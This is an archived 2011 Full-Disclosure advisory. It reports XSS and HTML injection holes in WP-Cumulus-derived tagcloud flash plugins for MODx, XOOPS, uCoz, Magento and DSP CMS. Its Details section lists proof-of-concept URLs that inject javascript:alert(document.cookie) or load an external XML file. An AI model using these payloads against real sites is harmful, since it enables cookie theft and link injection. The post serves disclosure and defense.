lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 26 Dec 2011 20:53:52 +0200
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>
Subject: Vulnerabilities in plugins for MODx CMS, XOOPS,
	uCoz, Magento and DSP CMS

Hello list!

Besides tens millions of vulnerable web sites with affected flash files and
vulnerable multiple plugins for different engines, which I've wrote about
earlier, there are a lot of other vulnerable plugins. Here are new ones
(some of them are vulnerable to two XSS holes). There are Cross-Site
Scripting vulnerabilities in plugins for engines MODx CMS, XOOPS, uCoz,
Magento and DSP CMS, which all are ports of WP-Cumulus. A lot of other such
plugins for other engines can be vulnerable.

This XSS is similar to XSS vulnerability in WP-Cumulus, which I've disclosed
in 2009 (http://securityvulns.com/Wdocument842.html). Because these plugins
are using tagcloud.swf made by author of WP-Cumulus. About such
vulnerabilities I wrote in 2009-2011, particularly about millions of flash
files tagcloud.swf which are vulnerable to XSS attacks I mentioned in my
article XSS vulnerabilities in 34 millions flash files
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2010-January/006033.html).

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Tagcloud for MODx CMS.

Vulnerable is Сumulus for XOOPS 1.0, which is also included in
ExtendedPackRU for XOOPS.

Vulnerable are all versions of uCoz-Cumulus for uCoz.

Vulnerable are all versions of Cumulus Tagcloud for Magento.

Vulnerable are all versions of Сumulus for DSP CMS.

Some of these plugins are vulnerable to one and some to two XSS holes - as
to first hole in WP-Cumulus, which I've disclosed in 2009, as to second
hole, which I've disclosed in 2011.

Besides these ones and those which I've disclosed in 2009-2011, a lot of
other such plugins for other engines can be vulnerable.

----------
Details:
----------

XSS (WASC-08):

Tagcloud for MODx CMS:

http://site/assets/files/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Сumulus for XOOPS:

http://site/modules/cumulus/include/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

uCoz-Cumulus for uCoz:

http://site/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href='javascript:alert(document.cookie)'+style='font-size:+40pt'%3EClick%20me%3C/a%3E%3C/tags%3E

Cumulus Tagcloud for Magento:

http://site/frontend/tag/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

http://site/frontend/tag/tagcloud.swf?xmlpath=xss.xml

http://site/frontend/tag/tagcloud.swf?xmlpath=http://site/xss.xml

Via parameters mode and xmlpath.

Сumulus for DSP CMS:

http://site/engine/tags/cumulus.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Code will execute after click. It's strictly social XSS
(http://websecurity.com.ua/5476/). Also it's possible to conduct (like in
WP-Cumulus) HTML Injection attack.

-------------------------------------------------
Plugins with fixed version of swf-file:
-------------------------------------------------

Because in November 2009, after my informing, Roy Tanck (developer of
WP-Cumulus) fixed only XSS vector, but not HTML Injection vector, it's still
possible to conduct HTML Injection attacks (for injecting arbitrary links)
to all versions of this swf-file (which can be found under name tagcloud.swf
and other names). Including fixed version of the swf-file, with fixed XSS
hole.

So all those plugins, which developers fixed this vulnerability (after my
informing or by informing from Roy or other people) by updating swf-file,
are still vulnerable to HTML Injection. These five plugins are using
non-fixed version of swf-file.

I mentioned about these vulnerabilities at my site:
http://websecurity.com.ua/5601/

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ